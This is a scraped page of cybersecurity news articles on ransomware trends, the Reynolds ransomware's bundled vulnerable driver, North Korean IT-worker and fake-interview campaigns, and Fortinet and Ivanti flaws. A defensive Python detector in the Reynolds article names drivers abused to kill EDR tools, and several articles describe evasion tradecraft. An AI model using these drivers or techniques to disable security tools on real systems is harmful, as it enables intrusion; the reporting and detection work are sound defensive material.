Category: Cybersecurity

  • From Ransomware to Residency: Inside the Rise of the Digital Parasite

    From Ransomware to Residency: Inside the Rise of the Digital Parasite

    Are ransomware and encryption still the defining signals of modern cyberattacks, or has the industry been too fixated on noise while missing a more dangerous shift happening quietly all around them?

    According to Picus Labs’ new Red Report 2026, which analyzed over 1.1 million malicious files and mapped 15.5 million adversarial actions observed across 2025, attackers are no longer optimizing for disruption. Instead, their goal is now long-term, invisible access.

    To be clear, ransomware isn’t going anywhere, and adversaries continue to innovate. But the data shows a clear strategic pivot away from loud, destructive attacks toward techniques designed to evade detection, persist inside environments, and quietly exploit identity and trusted infrastructure. Rather than breaking in and burning systems down, today’s attackers increasingly behave like Digital Parasites. They live inside the host, feed on credentials and services, and remain undetected for as long as possible.

    Public attention often gravitates toward dramatic outages and visible impact. The data in this year’s Red Report tells a quieter story, one that reveals where defenders are actually losing visibility.

    The Ransomware Signal Is Fading

    For the past decade, ransomware encryption served as the clearest signal of cyber risk. When your systems locked up and your operations froze, compromise was undeniable.

    That signal is now losing relevance. Year over year, Data Encrypted for Impact (T1486) dropped by 38%, declining from 21.00% in 2024 to 12.94% in 2025. This decline doesn’t show reduced attacker capability. It reflects a deliberate shift in strategy instead.

    Rather than locking data to force payment, threat actors are shifting toward data extortion as their primary monetization model. By avoiding encryption, attackers keep systems operational while they:

    • Quietly exfiltrate sensitive data
    • Harvest credentials and tokens
    • Remain embedded in environments for extended periods
    • Apply pressure later through extortion rather than disruption

    The implication is clear: impact is no longer defined by locked systems, but by how long attackers can maintain access within a host’s systems without being detected.

    “The adversary’s business model has shifted from immediate disruption to long-lived access.” – Picus Red Report 2026

    Credential Theft Becomes the Control Plane (A Quarter of Attacks)

    As attackers shift toward prolonged, stealthy persistence, identity becomes the most reliable path to control.

    The Red Report 2026 shows that Credentials from Password Stores (T1555) appear in nearly one out of every four attacks (23.49%), making credential theft one of the most prevalent behaviors observed over the last year.

    Rather than relying on noisy credential dumping or complex exploit chains, attackers are increasingly extracting saved credentials directly from browsers, keychains, and password managers. Once they have valid credentials, privilege escalation and lateral movement are usually just a little native administrative tooling away.

    More and more modern malware campaigns are behaving like digital parasites. There are no alarms, no crashes, and no obvious indicators. Just an eerie quiet.

    This same logic now shapes attacker tradecraft more broadly.

    80% of Top ATT&CK Techniques Now Favor Stealth

    Despite the breadth of the MITRE ATT&CK® framework, real-world malware activity continues to concentrate around a small set of techniques that are increasingly prioritizing evasion and persistence.

    The Red Report 2026 reveals a stark imbalance: Eight of the Top Ten MITRE ATT&CK techniques are now primarily dedicated to evasion, persistence, or stealthy command-and-control. This represents the highest concentration of stealth-focused tradecraft Picus Labs has ever recorded, signaling a fundamental shift in attacker success metrics.

    Rather than prioritizing immediate impact, modern adversaries are optimizing for maximum dwell time. Techniques that enable attackers to hide, blend in, and remain operational for extended periods now outweigh those designed for disruption.

    Here are some of the most commonly observed behaviors from this year’s report:

    • T1055 – Process Injection allows malware to run inside trusted system processes, making malicious activity difficult to distinguish from legitimate execution.
    • T1547 – Boot or Logon Autostart Execution ensures persistence by surviving reboots and user logins.
    • T1071 – Application Layer Protocols provide “whisper channels” for command-and-control, blending attacker traffic into normal web and cloud communications.
    • T1497 – Virtualization and Sandbox Evasion enables malware to detect analysis environments and refuse to execute when it suspects it is being observed.

    The combined effect is powerful. Legitimate-looking processes use legitimate tools to quietly operate over widely trusted channels. Signature-based detection struggles in this environment, while behavioral analysis becomes increasingly important for identifying illicit activity deliberately designed to appear normal.

    Where encryption once defined the attack, stealth now defines its success.

    Self-Aware Malware Refuses to Be Analyzed

    When stealth becomes the primary measure of success, evading detection alone is no longer enough. Attackers must also avoid triggering the tools defenders rely on to observe their malicious behavior in the first place. The Red Report 2026 shows this clearly in the rise of Virtualization and Sandbox Evasion (T1497), which moved into the top tier of attacker tradecraft in 2025.

    Modern malware increasingly evaluates where it is before deciding whether to act. Instead of relying on simple artifact checks, some samples assess execution context and user interaction to determine if they’re actually operating in a real environment. 

    In one example highlighted in the report, LummaC2 analyzed mouse movement patterns using geometry, calculating Euclidean distance and cursor angles to distinguish human interaction from the linear motion typical of automated sandbox environments. When conditions appeared artificial, it deliberately suppressed any execution and just sat there, quietly biding its time.

    This behavior reflects a deeper shift in attacker logic. Malware can no longer be relied on to reveal itself in sandbox environments. It withholds activity by design, remaining dormant until it reaches a real production system. 

    In an ecosystem dominated by stealth and persistence, inaction itself has become a core evasion technique.

    AI Hype vs. Reality: Evolution, Not Revolution

With attackers demonstrating increasingly adaptive behavior, it’s natural to ask where artificial intelligence fits into this picture.

    The Red Report 2026 data suggests a measured answer. Despite widespread speculation, almost anticipation, about AI reshaping the malware landscape, Picus Labs observed no meaningful increase in AI-driven malware techniques across the 2025 dataset.

    Instead, the most prevalent behaviors remain familiar. Longstanding techniques such as Process Injection and Command and Scripting Interpreter continue to dominate real-world intrusions, reinforcing that attackers do not require advanced AI to bypass modern defenses.

    Some malware families have begun experimenting with large language model APIs, but so far their use has remained limited in scope. In observed cases, LLM services were primarily used to retrieve predefined commands or act as a convenient communication layer. These implementations improve efficiency, but they’re not fundamentally altering attacker decision-making or execution logic.

    So far, the data shows that AI is being absorbed into existing tradecraft rather than redefining it. The mechanics of the Digital Parasite remain unchanged: credential theft, stealthy persistence, abuse of trusted processes, and longer and longer dwell times. 

    Attackers are not winning by inventing radically new techniques. They’re winning by becoming quieter, more patient, and increasingly hard to distinguish from legitimate activity.

    Back to Basics for a Different Threat Model

    Having run these reports annually for some time now, we see a continuing trend with many of the same tactics appearing year after year. What has fundamentally changed is the objective.

    Modern attacks prioritize:

    • remaining invisible
    • abusing trusted identities and tools
    • disabling defenses quietly
    • maintaining access over time

By doubling down on modern security fundamentals (behavior-based detection, credential hygiene, and continuous Adversarial Exposure Validation), organizations can focus less on dramatic attack scenarios and more on the threats that are actually succeeding today.

    Ready to Validate Against the Digital Parasite?

    While ransomware headlines still dominate the news cycle, the Red Report 2026 shows that, more and more, the real risk lies in silent, persistent compromise. Picus Security focuses on validating defenses against the specific techniques attackers are using right now, not just the ones making the most noise.

    Ready to see the full data behind the Digital Parasite model? 

    Download the Picus Red Report 2026 to explore this year’s findings and understand how modern adversaries are staying inside networks longer than ever before.

    Note: This article was written by Sıla Özeren Hacıoğlu, Security Research Engineer at Picus Security.



    Source: thehackernews.com…

  • Reynolds Ransomware Embeds BYOVD Driver to Disable EDR Security Tools

    Reynolds Ransomware Embeds BYOVD Driver to Disable EDR Security Tools

    Cybersecurity researchers have disclosed details of an emergent ransomware family dubbed Reynolds that comes embedded with a built-in bring your own vulnerable driver (BYOVD) component for defense evasion purposes within the ransomware payload itself.

    BYOVD refers to an adversarial technique that abuses legitimate but flawed driver software to escalate privileges and disable Endpoint Detection and Response (EDR) solutions so that malicious activities go unnoticed. The strategy has been adopted by many ransomware groups over the years.

    “Normally, the BYOVD defense evasion component of an attack would involve a distinct tool that would be deployed on the system prior to the ransomware payload in order to disable security software,” the Symantec and Carbon Black Threat Hunter Team said in a report shared with The Hacker News. “However, in this attack, the vulnerable driver (an NsecSoft NSecKrnl driver) was bundled with the ransomware itself.”

    Broadcom’s cybersecurity teams noted that this tactic of bundling a defense evasion component within the ransomware payload is not novel, and that it has been observed in a Ryuk ransomware attack in 2020 and in an incident involving a lesser-known ransomware family called Obscura in late August 2025.

    In the Reynolds campaign, the ransomware is designed to drop a vulnerable NsecSoft NSecKrnl driver and terminate processes associated with various security programs from Avast, CrowdStrike Falcon, Palo Alto Networks Cortex XDR, Sophos (along with HitmanPro.Alert), and Symantec Endpoint Protection, among others.

It’s worth noting that the NSecKrnl driver is susceptible to a known security flaw (CVE-2025-68947, CVSS score: 5.7) that could be exploited to terminate arbitrary processes. Notably, the driver has been put to use by a threat actor known as Silver Fox in attacks designed to kill endpoint security tools prior to delivering ValleyRAT.

Over the past year, the hacking group has wielded multiple legitimate but flawed drivers – including truesight.sys and amsdk.sys – as part of BYOVD attacks to disarm security programs.

Bringing defense evasion and ransomware capabilities together into one component makes it harder for defenders to stop the attack, and it also removes the need for an affiliate to separately incorporate this step into their modus operandi.
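The sequence described above (a known-vulnerable driver is loaded, then security-tool processes are terminated from it) is something a SOC can look for as a correlated pattern rather than as a single signature. The following is an added example, not code from the article or from Symantec/Carbon Black: it parses a constructed, Sysmon-style stream of driver-load and process-termination events, flags loads of driver names the article names as abused in BYOVD attacks, and raises the severity when a security process dies on the same host within a short window of such a load. The log format, the `.sys` file name assumed for the NSecKrnl driver, and the security process names are assumptions made for this example; in production you would match against a maintained blocklist (for example Microsoft's vulnerable driver blocklist) and your own vendor's process list.

```python
"""
Added example (not from the article or the vendors it cites): correlate
vulnerable-driver loads with subsequent termination of security processes.

All log lines, the field layout, the NSecKrnl file name and the security
process names below are constructed/assumed for this example.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

# Driver names the article reports as abused in BYOVD attacks (lower-cased).
# The ".sys" file name for the NsecSoft NSecKrnl driver is an assumption.
WATCHLIST_DRIVERS = {
    "nseckrnl.sys",      # NsecSoft NSecKrnl (file name assumed)
    "truesight.sys",
    "amsdk.sys",
    "gamedriverx64.sys",
}

# Placeholder EDR/AV process names, constructed for the example only.
SECURITY_PROCESSES = {"edr_agent.exe", "av_service.exe", "sensor.exe"}

# How long after a watchlisted driver load a security-process kill is
# considered related (tuning assumption).
KILL_WINDOW = timedelta(minutes=5)


@dataclass
class Event:
    ts: datetime
    host: str
    kind: str    # "DriverLoad" or "ProcessTerminate"
    name: str    # lower-cased file name of the driver or process image


def parse_line(line: str) -> Event:
    # Constructed format: "<ISO timestamp> <host> <EventType> name=<path or image>"
    ts, host, kind, field = line.split(" ", 3)
    key, _, value = field.partition("=")
    if key != "name":
        raise ValueError(f"unexpected field {key!r} in {line!r}")
    # Keep only the file name so full paths and bare names match the same way.
    base = value.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return Event(datetime.fromisoformat(ts), host, kind, base)


def detect_byovd(lines) -> list[dict]:
    """Return findings in time order: 'medium' for a watchlisted driver load,
    'high' for a security-process termination shortly after such a load."""
    events = sorted((parse_line(l) for l in lines if l.strip()), key=lambda e: e.ts)
    findings: list[dict] = []
    recent_loads: dict[str, list[Event]] = {}   # host -> watchlisted loads seen
    for ev in events:
        if ev.kind == "DriverLoad" and ev.name in WATCHLIST_DRIVERS:
            recent_loads.setdefault(ev.host, []).append(ev)
            findings.append({"host": ev.host, "severity": "medium",
                             "ts": ev.ts.isoformat(),
                             "reason": f"vulnerable driver loaded: {ev.name}"})
        elif ev.kind == "ProcessTerminate" and ev.name in SECURITY_PROCESSES:
            # Only a kill that follows a load (not one that precedes it) counts.
            for load in recent_loads.get(ev.host, []):
                delta = ev.ts - load.ts
                if timedelta(0) <= delta <= KILL_WINDOW:
                    secs = int(delta.total_seconds())
                    findings.append({"host": ev.host, "severity": "high",
                                     "ts": ev.ts.isoformat(),
                                     "reason": f"{ev.name} terminated {secs}s after {load.name} loaded"})
                    break
    return findings


# Constructed sample log. WS-17 shows the BYOVD sequence; WS-22 shows a
# termination that happens *before* any suspicious load, which must not fire.
SAMPLE_LOG = r"""
2026-02-09T10:00:01 WS-17 DriverLoad name=C:\Windows\System32\drivers\tcpip.sys
2026-02-09T10:02:15 WS-17 DriverLoad name=C:\Users\Public\NSecKrnl.sys
2026-02-09T10:02:20 WS-17 ProcessTerminate name=edr_agent.exe
2026-02-09T10:02:21 WS-17 ProcessTerminate name=av_service.exe
2026-02-09T10:30:00 WS-22 ProcessTerminate name=edr_agent.exe
2026-02-09T11:00:00 WS-22 DriverLoad name=C:\Temp\truesight.sys
"""


def run_example() -> list[dict]:
    return detect_byovd(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for f in run_example():
        print(f["severity"].upper(), f["host"], f["ts"], f["reason"])
```

Run as-is it reports one medium and two high findings for WS-17 and only a medium finding for WS-22, because the WS-22 termination precedes the driver load. A bundled loader like Reynolds compresses the gap between load and kill to seconds, so the window can be short; keeping the plain driver-load finding at medium means the alert still fires when the kill events themselves are missing (for instance because the sensor was the first thing terminated).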

“Also of note in this attack campaign was the presence of a suspicious side-loaded loader on the target’s network several weeks prior to the ransomware being deployed,” Symantec and Carbon Black said.

    Another tool deployed on the target network a day after the ransomware deployment was the GotoHTTP remote access program, indicating that the attackers may be looking to maintain persistent access to the compromised hosts.

    “BYOVD is popular with attackers due to its effectiveness and reliance on legitimate, signed files, which are less likely to raise red flags,” the company said.

    “The advantages of wrapping the defense evasion capability in with the ransomware payload, and the reason ransomware actors might do this, may include the fact that packaging the defense evasion binary and the ransomware payload together is “quieter”, with no separate external file dropped on the victim network.”

    The finding coincides with various ransomware-related developments in recent weeks –

    • A high-volume phishing campaign has used emails with Windows shortcut (LNK) attachments to run PowerShell code that fetches a Phorpiex dropper, which is then used to deliver the GLOBAL GROUP ransomware. The ransomware is notable for carrying out all activity locally on the compromised system, making it compatible with air‑gapped environments. It also conducts no data exfiltration.
    • Attacks mounted by WantToCry have abused virtual machines (VMs) provisioned by ISPsystem, a legitimate virtual infrastructure management provider, to host and deliver malicious payloads at scale. Some of the hostnames have been identified in the infrastructure of multiple ransomware operators, including LockBit, Qilin, Conti, BlackCat, and Ursnif, as well as various malware campaigns involving NetSupport RAT, PureRAT, Lampion, Lumma Stealer, and RedLine Stealer.
    • It’s assessed that bulletproof hosting providers are leasing ISPsystem virtual machines to other criminal actors for use in ransomware operations and malware delivery by exploiting a design weakness in VMmanager’s default Windows templates that reuse the same static hostname and system identifiers every time they are deployed. This, in turn, allows threat actors to set up thousands of VMs with the same hostname and complicate takedown efforts.
    • DragonForce has created a “Company Data Audit” service to support affiliates during extortion campaigns as part of the continued professionalization of ransomware operations. “The audit includes a detailed risk report, prepared communication materials, such as call scripts and executive-level letters, and strategic guidance designed to influence negotiations,” LevelBlue said. DragonForce operates as a cartel that allows affiliates to create their own brands while operating under its umbrella and gaining access to its resources and services.
• The latest iteration of LockBit, LockBit 5.0, has been found to use ChaCha20 to encrypt files and data across Windows, Linux, and ESXi environments, a shift from the AES-based encryption approach in LockBit 2.0 and LockBit 3.0. In addition, the new version features a wiper component, an option to delay execution prior to encryption, a progress bar for tracking encryption status, improved anti-analysis techniques to evade detection, and enhanced in-memory execution to minimize disk traces.
    • The Interlock ransomware group has continued its assault on U.K.- and U.S.-based organizations, particularly in the education sector, in one case leveraging a zero-day vulnerability in the “GameDriverx64.sys” gaming anti-cheat driver (CVE-2025-61155, CVSS score: 5.5) to disable security tools in a BYOVD attack. The attack is also characterized by the deployment of NodeSnake/Interlock RAT (aka CORNFLAKE) to steal sensitive data, while initial access is said to have originated from a MintLoader infection.
    • Ransomware operators have been observed increasingly shifting their focus from traditional on-premises targets to cloud storage services, especially misconfigured S3 buckets used by Amazon Web Services (AWS), with the attacks leaning on native cloud features to delete or overwrite data, suspend access, or extract sensitive content, while simultaneously staying under the radar.

    According to data from Cyble, GLOBAL GROUP is one of the many ransomware crews that sprang forth in 2025, the others being Devman, DireWolf, NOVA, J group, Warlock, BEAST, Sinobi, NightSpire, and The Gentlemen. In Q4 2025 alone, Sinobi’s data leak site listings increased 306%, making it the third-most active ransomware group after Qilin and Akira, per ReliaQuest.

    “Meanwhile, the return of LockBit 5.0 was one of Q4’s biggest shifts, driven by a late-quarter spike that saw the group list 110 organizations in December alone,” researcher Gautham Ashok said. “This output signals a group that can scale execution quickly, convert intrusions into impact, and sustain an affiliate pipeline capable of operating at volume.”

    The emergence of new players, combined with partnerships forged between existing groups, has led to a spike in ransomware activity. Ransomware actors claimed a total of 4,737 attacks during 2025, up from 4,701 in 2024. The number of attacks that don’t involve encryption and instead rely purely on data theft as a means to exert pressure reached 6,182 during the same period, a 23% increase from 2024.

    As for the average ransom payment, the figure stood at $591,988 in Q4 2025, a 57% jump from Q3 2025, driven by a small number of “outsized settlements,” Coveware said in its quarterly report last week, adding threat actors may return to their “data encryption roots” for more effective leverage to extract ransoms from victims.


    Source: thehackernews.com…

  • DPRK Operatives Impersonate Professionals on LinkedIn to Infiltrate Companies

    DPRK Operatives Impersonate Professionals on LinkedIn to Infiltrate Companies

    The information technology (IT) workers associated with the Democratic People’s Republic of Korea (DPRK) are now applying to remote positions using real LinkedIn accounts of individuals they’re impersonating, marking a new escalation of the fraudulent scheme.

    “These profiles often have verified workplace emails and identity badges, which DPRK operatives hope will make their fraudulent applications appear legitimate,” Security Alliance (SEAL) said in a series of posts on X.

    The IT worker threat is a long-running operation mounted by North Korea in which operatives from the country pose as remote workers to secure jobs in Western companies and elsewhere under stolen or fabricated identities. The threat is also tracked by the broader cybersecurity community as Jasper Sleet, PurpleDelta, and Wagemole.

    The end goal of these efforts is two-pronged: to generate a steady revenue stream to fund the nation’s weapons programs, conduct espionage by stealing sensitive data, and, in some cases, take it further by demanding ransoms to avoid leaking the information.

    Last month, cybersecurity company Silent Push described the DPRK remote worker program as a “high-volume revenue engine” for the regime, enabling the threat actors to also gain administrative access to sensitive codebases and establish living-off-the-land persistence within corporate infrastructure.

    “Once their salaries are paid, DPRK IT workers transfer cryptocurrency through a variety of different money laundering techniques,” blockchain analysis firm Chainalysis noted in a report published in October 2025.

    “One of the ways in which IT workers, as well as their money laundering counterparts, break the link between source and destination of funds on-chain, is through chain-hopping and/or token swapping. They leverage smart contracts such as decentralized exchanges and bridge protocols to complicate the tracing of funds.”

    To counter the threat, individuals who suspect their identities are being misappropriated in fraudulent job applications are advised to consider posting a warning on their social media accounts, along with listing their official communication channels and the verification method to contact them (e.g., company email). 

    “Always validate that accounts listed by candidates are controlled by the email they provide,” Security Alliance said. “Simple checks like asking them to connect with you on LinkedIn will verify their ownership and control of the account.”

    The disclosure comes as the Norwegian Police Security Service (PST) issued an advisory, stating it’s aware of “several cases” over the past year where Norwegian businesses have been impacted by IT worker schemes.

“The businesses have been tricked into hiring what are likely North Korean IT workers in home office positions,” PST said last week. “The salary income North Korean employees receive through such positions probably goes to finance the country’s weapons and nuclear weapons program.”

    Running parallel to the IT worker scheme is another social engineering campaign dubbed Contagious Interview that involves using fake hiring flows to lure prospective targets into interviews after approaching them on LinkedIn with job offers. The malicious phase of the attack kicks in when individuals presenting themselves as recruiters and hiring managers instruct targets to complete a skill assessment that eventually leads to them executing malicious code.

    In one case of a recruiting impersonation campaign targeting tech workers using a hiring process resembling that of digital asset infrastructure company Fireblocks, the threat actors are said to have asked candidates to clone a GitHub repository and run commands to install an npm package to trigger malware execution.

    “The campaign also employed EtherHiding, a novel technique that leverages blockchain smart contracts to host and retrieve command-and-control infrastructure, making the malicious payload more resilient to takedowns,” security researcher Ori Hershko said. “These steps triggered the execution of malicious code hidden within the project. Running the setup process resulted in malware being downloaded and executed on the victim’s system, giving the attackers a foothold in the victim’s machine.”

    In recent months, new variants of the Contagious Interview campaign have been observed using malicious Microsoft VS Code task files to execute JavaScript malware disguised as web fonts that ultimately lead to the deployment of BeaverTail and InvisibleFerret, allowing persistent access and theft of cryptocurrency wallets and browser credentials, per reports from Abstract Security and OpenSourceMalware.

    Koalemos RAT campaign

    Another variant of the intrusion set documented by Panther is suspected to involve the use of malicious npm packages to deploy a modular JavaScript remote access trojan (RAT) framework dubbed Koalemos via a loader. The RAT is designed to enter a beacon loop to retrieve tasks from an external server, execute them, send encrypted responses, and sleep for a random time interval before repeating again.

    It supports 12 different commands to conduct filesystem operations, transfer files, run discovery instructions (e.g., whoami), and execute arbitrary code. The names of some of the packages associated with the activity are as follows –

    • env-workflow-test
    • sra-test-test
    • sra-testing-test
    • vg-medallia-digital
    • vg-ccc-client
    • vg-dev-env

    “The initial loader performs DNS-based execution gating and engagement date validation before downloading and spawning the RAT module as a detached process,” security researcher Alessandra Rizzo said. “Koalemos performs system fingerprinting, establishes encrypted command-and-control communications, and provides full remote access capabilities.”

    Labyrinth Chollima Segments into Specialized Operational Units

    The development comes as CrowdStrike revealed that the prolific North Korean hacking crew known as Labyrinth Chollima has evolved into three separate clusters with distinct objectives and tradecraft: the core Labyrinth Chollima group, Golden Chollima (aka AppleJeus, Citrine Sleet, and UNC4736), and Pressure Chollima (aka Jade Sleet, TraderTraitor, and UNC4899).

    It’s worth noting that Labyrinth Chollima, along with Andariel and BlueNoroff, are considered to be sub-clusters within the Lazarus Group (aka Diamond Sleet and Hidden Cobra), with BlueNoroff splintering into TraderTraitor and CryptoCore (aka Sapphire Sleet), according to an assessment from DTEX.

    Despite the newfound independence, these adversaries continue to share tools and infrastructure, suggesting centralized coordination and resource allocation within the DPRK cyber apparatus. Golden Chollima focuses on consistent, smaller-scale cryptocurrency thefts in economically developed regions, whereas Pressure Chollima pursues high-value heists with advanced implants to single out organizations with significant digital asset holdings.

    New North Korea Clusters

    On the other hand, Labyrinth Chollima’s operations are motivated by cyber espionage, using tools like the FudModule rootkit to achieve stealth. The latter is also attributed to Operation Dream Job, another job-centred social engineering campaign designed to deliver malware for intelligence gathering.

    “Shared infrastructure elements and tool cross-pollination indicate these units maintain close coordination,” CrowdStrike said. “All three adversaries employ remarkably similar tradecraft – including supply chain compromises, HR-themed social engineering campaigns, trojanized legitimate software, and malicious Node.js and Python packages.”


    Source: thehackernews.com…

  • Fortinet Patches Critical SQLi Flaw Enabling Unauthenticated Code Execution

    Fortinet Patches Critical SQLi Flaw Enabling Unauthenticated Code Execution

Ravie Lakshmanan | Feb 10, 2026 | Vulnerability / Network Security

    Fortinet has released security updates to address a critical flaw impacting FortiClientEMS that could lead to the execution of arbitrary code on susceptible systems.

    The vulnerability, tracked as CVE-2026-21643, has a CVSS rating of 9.1 out of a maximum of 10.0.

    “An improper neutralization of special elements used in an SQL Command (‘SQL Injection’) vulnerability [CWE-89] in FortiClientEMS may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted HTTP requests,” Fortinet said in an advisory.

    The shortcoming affects the following versions –

    • FortiClientEMS 7.2 (Not affected)
    • FortiClientEMS 7.4.4 (Upgrade to 7.4.5 or above)
    • FortiClientEMS 8.0 (Not affected)

    Gwendal Guégniaud of the Fortinet Product Security team has been credited with discovering and reporting the flaw.

    While Fortinet makes no mention of the vulnerability being exploited in the wild, it’s essential that users move quickly to apply the fixes.

    The development comes as the company addressed another critical severity flaw in FortiOS, FortiManager, FortiAnalyzer, FortiProxy, FortiWeb (CVE-2026-24858, CVSS score: 9.4) that allows an attacker with a FortiCloud account and a registered device to log into other devices registered to other accounts, if FortiCloud SSO authentication is enabled on those devices.

    Fortinet has since acknowledged that the issue has been actively exploited by bad actors to create local admin accounts for persistence, make configuration changes granting VPN access to those accounts, and exfiltrate the firewall configurations.


    Source: thehackernews.com…

  • Dutch Authorities Confirm Ivanti Zero-Day Exploit Exposed Employee Contact Data

    Dutch Authorities Confirm Ivanti Zero-Day Exploit Exposed Employee Contact Data

Ravie Lakshmanan | Feb 10, 2026 | Data Breach / Vulnerability

The Netherlands’ Data Protection Authority (AP) and the Council for the Judiciary (Rvdr) have disclosed that their systems were impacted by cyber attacks that exploited the recently disclosed security flaws in Ivanti Endpoint Manager Mobile (EPMM), according to a notice sent to the country’s parliament on Friday.

    “On January 29, the National Cyber Security Center (NCSC) was informed by the supplier of vulnerabilities in EPMM,” the Dutch authorities said. “EPMM is used to manage mobile devices, apps, and content, including their security.”

    “It is now known that work-related data of AP employees, such as names, business email addresses, and telephone numbers, have been accessed by unauthorized persons.”

    The development comes as the European Commission also revealed that its central infrastructure managing mobile devices “identified traces” of a cyber attack that may have resulted in access to names and mobile numbers of some of its staff members. The Commission said the incident was contained within nine hours, and that no compromise of mobile devices was detected.

    “The Commission takes seriously the security and resilience of its internal systems and data and will continue to monitor the situation,” it added. “It will take all necessary measures to ensure the security of its systems.”

Although the name of the vendor was not specified and no details were shared on how the attackers managed to gain access, the incident is suspected to be linked to malicious activity exploiting flaws in Ivanti EPMM.

    Finland’s state information and communications technology provider, Valtori, also disclosed a breach that exposed work-related details of up to 50,000 government employees. The incident, identified on January 30, 2026, targeted a zero-day vulnerability in the mobile device management service.

    The agency said it installed the corrective patch on January 29, 2026, the same day Ivanti released fixes for CVE-2026-1281 and CVE-2026-1340 (CVSS scores: 9.8), which could be exploited by an attacker to achieve unauthenticated remote code execution.

    Ivanti has acknowledged that the vulnerabilities have been exploited as zero-days, and that a “very limited number of customers” were exploited, but it has not provided an updated victim count.

    The attacker is said to have gained access to information used in operating the service, including names, work email addresses, phone numbers, and device details.

“Investigations have shown that the management system did not permanently delete removed data but only marked it as deleted,” it said. “As a result, device and user data belonging to all organizations that have used the service during its lifecycle may have been compromised. In certain cases, a single mobile device may have multiple users.”

    watchTowr CEO Benjamin Harris told The Hacker News in an emailed statement that the attacks are not acts of random opportunism, but rather the work of a “highly skilled, well-resourced actor executing a precision campaign.”

    “Attackers are targeting your most trusted, deeply embedded enterprise systems. Anything assumed to be ‘internal’ or ‘safe’ should now be viewed with suspicion,” Harris said.

    “Resilience is as important as prevention, especially when attackers move fast and operate with surgical precision. What differentiates minor headaches from full-blown crises is speed: how quickly teams identify anomalies, validate weaknesses, and contain the damage.”


    Source: thehackernews.com…

  • How Top CISOs Solve Burnout and Speed up MTTR without Extra Hiring

    How Top CISOs Solve Burnout and Speed up MTTR without Extra Hiring

    Why do SOC teams keep burning out and missing SLAs even after spending big on security tools? Routine triage piles up, senior specialists get dragged into basic validation, and MTTR climbs, while stealthy threats still find room to slip through. Top CISOs have realized the solution isn’t hiring more people or stacking yet another tool onto the workflow, but giving their teams faster, clearer behavior evidence from the start.

    Here’s how they’re breaking the cycle and speeding up response without extra hiring.

    Starting with Sandbox-First Investigation to Cut MTTR at the Source

    The fastest way to reduce MTTR is to remove the delays baked into investigations. Static verdicts and fragmented workflows force analysts to guess, escalate, and re-check the same alerts, which drives burnout and slows containment.

    That’s why top CISOs are making sandbox execution the first step.

    With an interactive sandbox like ANY.RUN, teams can detonate suspicious files and links in an isolated environment and see real behavior immediately, so decisions happen early, not after hours of back-and-forth.


    Full phishing attack chain analyzed inside an interactive sandbox in real time, revealing a fake Microsoft login page

    Why CISOs prioritize sandbox-first workflows:

    • MTTR drops because clarity comes in minutes: Runtime evidence replaces assumptions, so qualification and containment start faster.
    • Fewer escalations, less senior time wasted: Tier-1 validates alerts with behavior proof, driving up to a 30% reduction in Tier-1 → Tier-2 escalations and keeping specialists focused on real incidents.
    • Lower burnout through fewer manual steps: Less “chasing context,” fewer repeats, more predictable workloads.

    Save up to 21 minutes per case by making alert qualification evidence-driven, freeing senior time, reducing escalations, and lowering incident cost.


    Automating Triage to Increase SOC Output and Protect SLAs

    After early clarity comes scale. Even with strong visibility, SOCs slow down if every alert still demands manual effort. By automating triage, CISOs unlock measurable gains across response speed, workload balance, and SOC efficiency:

    • Faster investigations, faster containment: Automated execution shortens the gap between alert and decision, directly reducing MTTR.
    • Fewer errors under pressure: Consistent handling of routine steps lowers risk during high-volume periods.
    • More impact from the same team: Junior staff resolve more alerts independently, reducing escalation load on senior specialists.
    • Better use of senior expertise: Experts spend time on real incidents, not revalidating basic alerts.
    • Higher SOC efficiency overall: Less fatigue, fewer handoffs, and steadier SLA performance.

    In real phishing and malware campaigns, attackers often hide malicious behavior behind QR codes, redirect chains, or CAPTCHA gates. Manually replaying these steps costs time and attention, exactly what SOC teams don’t have.

    Phishing attack with QR code exposed with the help of automation and interactivity, saving time and resources

    With automated sandbox execution, those steps are handled instantly. Hidden URLs are opened, gating is passed, and malicious behavior is exposed within seconds, without waiting, retries, or workarounds.

    Malicious URL revealed inside ANY.RUN sandbox

    Analysts can still step in live at any moment, inspect processes, or trigger additional actions, but they’re no longer burdened by repetitive setup work.

    Giving the team this dual approach, automation plus interactivity, means the following for CISOs: faster response, lower workload, and more SOC capacity, without adding headcount. Automation not only speeds up investigations but also stabilizes the team behind them.

    Reducing Burnout by Removing Decision Fatigue

    Burnout in the SOC isn’t caused by a lack of commitment. It’s caused by constant high-stakes decisions made with incomplete information. When teams spend their shifts deciding whether alerts are “probably fine” or “worth escalating,” stress compounds quickly.

    Sandbox-first and automated triage workflows change that dynamic.

    Instead of guessing, teams work from observable behavior. They get structured outputs they can act on immediately: behavior timelines, extracted IOCs, mapped TTPs, and clear, shareable reports that make handoffs fast and decisions defensible. When time is tight, built-in AI assistance helps summarize what matters, so analysts spend less energy interpreting noise and more time closing cases.

    ANY.RUN’s auto-generated reports for fast and efficient sharing

    For CISOs, the impact shows up in several ways:

    • More predictable workloads: Investigations follow consistent paths instead of expanding unpredictably.
    • Lower fatigue across shifts: Less manual replay, fewer tool switches, and fewer stalled cases.
    • Stronger team retention: Teams stay engaged when work leads to confident outcomes, not constant uncertainty.

    When decision fatigue drops, MTTR follows. The SOC becomes calmer, more focused, and easier to run, not because threats are simpler, but because the workflow is.

    What CISOs Are Reporting After Moving to Evidence-Based Response

    After shifting to sandbox-first investigation, automated triage, and built-in collaboration, CISOs using ANY.RUN report consistent improvements in how sustainably their SOCs operate.

    Across teams, leaders are seeing:

    • Up to 3× increase in SOC output: More alerts handled with the same team, driven by faster qualification and fewer repeat steps.
    • MTTR reduced by up to 50%: Early execution evidence shortens investigations and accelerates containment.
    • Up to 30% fewer Tier-1 → Tier-2 escalations: Clear behavior proof enables junior staff to resolve cases confidently.
    • Higher detection rates for evasive threats: 90% of organizations report higher detection rates, particularly for stealthy and evasive threats.
    • Lower burnout and steadier SLA performance: Predictable workflows replace constant firefighting, easing pressure across shifts.

    These numbers reflect real operational gains: faster response without extra hiring, better use of senior expertise, and a SOC that scales without exhausting the people running it.

    Build a Faster, More Sustainable SOC Without Extra Hiring

    The best SOCs don’t wait. They respond fast, protect their teams from burnout, and stay steady even when alert volume spikes. But that only happens when the investigation workflow is built for speed and sustainability.

    By making sandbox execution the first step, automating repetitive triage, and keeping investigation context shared and controlled, top CISOs are cutting MTTR without adding headcount.

